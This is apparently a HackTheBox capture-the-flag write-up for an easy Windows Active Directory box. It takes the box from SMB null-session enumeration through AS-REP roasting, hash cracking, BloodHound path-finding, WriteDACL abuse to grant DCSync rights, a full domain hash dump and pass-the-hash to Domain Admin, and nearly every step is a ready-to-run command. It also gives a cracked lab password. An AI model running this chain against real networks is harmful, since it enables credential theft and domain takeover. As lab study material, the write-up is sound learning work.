Box Info
| Platform | HackTheBox |
| Difficulty | Easy |
| OS | Windows Server 2016 |
| Key Techniques | AS-REP Roasting, BloodHound, WriteDACL Abuse, DCSync |
Attack Path Summary
SMB null session → enumerated 31 users → AS-REP Roasted svc-alfresco (no creds needed) → cracked hash → BloodHound showed path through Account Operators → Exchange Windows Permissions → WriteDACL on domain → granted DCSync rights → dumped all hashes → Pass-the-Hash → Domain Admin.
Second AD box. First time using AS-REP Roasting, BloodHound attack paths, ACL abuse, and DCSync.
Enumeration
echo "10.129.95.210 forest.htb.local htb.local forest" | sudo tee -a /etc/hosts
# Lesson: Add FQDN, domain, and hostname — different tools use different names
SMB — User Enumeration
nxc smb $ip -u '' -p '' --users
# Found 31 users. Key users: sebastien, lucinda, svc-alfresco, andy, mark, santi
# Saved real users to valid_users.txt
Foothold — AS-REP Roasting (No Creds Needed)
impacket-GetNPUsers htb.local/ -dc-ip $ip -usersfile valid_users.txt -format hashcat -outputfile asrep.txt
# svc-alfresco has "Do not require Kerberos pre-authentication" = TRUE
# Got AS-REP hash for free — no credentials needed at all
Cracking
# TIP: Use single quotes when saving hashes — double quotes corrupt $ characters!
hashcat -m 18200 -a 0 alfresco.hash /usr/share/wordlists/rockyou.txt
# Cracked: s3rvice
First creds: svc-alfresco:s3rvice
BloodHound — Finding the Attack Path
bloodhound-python -u 'svc-alfresco' -p 's3rvice' -ns $ip -d htb.local -c All
BloodHound pathfinding from SVC-ALFRESCO → DOMAIN ADMINS showed:
svc-alfresco → Service Accounts → Privileged IT Accounts → Account Operators
→ GenericAll over Exchange Windows Permissions
→ WriteDACL over HTB.LOCAL domain
→ Can grant DCSync rights → Dump all hashes
Without BloodHound you would NEVER find this path manually. Is 5 nested groups deep. This is why BloodHound matters.
Privilege Escalation — ACL Abuse Chain
Step 1: Add self to Exchange Windows Permissions group
net rpc group addmem "Exchange Windows Permissions" "svc-alfresco" -U 'htb.local/svc-alfresco%s3rvice' -S $ip
Step 2: Get shell via evil-winrm
evil-winrm -i $ip -u 'svc-alfresco' -p 's3rvice'
# evil-winrm features: upload, download, full PowerShell environment
Step 3: Upload PowerView and grant DCSync rights
upload /usr/share/windows-resources/powersploit/Recon/PowerView.ps1
. .\PowerView.ps1
Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity svc-alfresco -Rights DCSync
Step 4: DCSync — dump all domain hashes
impacket-secretsdump htb.local/svc-alfresco:'s3rvice'@$ip
# Got Administrator NTLM hash
Step 5: Pass-the-Hash
evil-winrm -i $ip -u 'Administrator' -H '<NTLM_HASH>'
Done.
Credentials
| Username | Password/Hash | Source | Scope |
|---|---|---|---|
| svc-alfresco | s3rvice | AS-REP Roasting | Domain user |
| Administrator | NTLM hash | DCSync | Domain Admin |
What I Learned
AS-REP Roasting — svc-alfresco had pre-auth disabled. Got the hash for free without any credentials. This should be checked before brute-forcing.
BloodHound is non-negotiable on AD. The path through 5 nested groups to WriteDACL is invisible without it.
ACL Abuse chain: GenericAll over a group = add yourself. WriteDACL over domain = grant yourself any permission. DCSync = dump every hash in the domain.
evil-winrm is king for AD post-exploitation. Upload/download files, run PowerShell scripts directly. Always use when port 5985 is open.
Hash file corruption — when saving hashes with echo, use SINGLE quotes: echo '$hash' > file.txt. Double quotes cause bash to interpret $ characters and corrupt the hash. Wasted time on this.
Pattern: “AS-REP Roast first (no creds needed), BloodHound second (find the path), ACL abuse third (walk the path).”